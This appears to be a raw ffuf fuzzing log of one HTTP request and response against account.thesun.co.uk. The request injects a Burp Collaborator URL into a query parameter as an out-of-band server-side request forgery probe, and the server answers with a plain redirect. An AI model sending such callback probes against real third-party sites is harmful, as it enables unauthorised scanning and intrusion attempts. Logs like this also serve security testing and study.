GET /?icq=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net HTTP/1.1
Host: account.thesun.co.uk
User-Agent: Fuzz Faster U Fool v1.2.0-git
Accept-Encoding: gzip


---- ↑ Request ---- Response ↓ ----

HTTP/1.1 302 Found
Content-Length: 43
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-transform
Cf-Cache-Status: DYNAMIC
Cf-Ray: 64142ab6e9ce5683-SIN
Cf-Request-Id: 098079065000005683a9384000000001
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Date: Sat, 17 Apr 2021 08:08:40 GMT
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Location: https://thesun.co.uk/
Ot-Baggage-Auth0-Request-Id: 64142ab6e9ce5683
Ot-Tracer-Sampled: true
Ot-Tracer-Spanid: 354e10616283b76c
Ot-Tracer-Traceid: 073e73d31db0904d
Server: cloudflare
Set-Cookie: __cfduid=d3add81634e3c029408fbb40b613bafda1618646920; expires=Mon, 17-May-21 08:08:40 GMT; path=/; domain=.account.thesun.co.uk; HttpOnly; SameSite=Lax; Secure
Strict-Transport-Security: max-age=31536000
Vary: Accept, Accept-Encoding
X-Auth0-Requestid: 8001086752acc14d7623
X-Content-Type-Options: nosniff

Found. Redirecting to https://thesun.co.uk/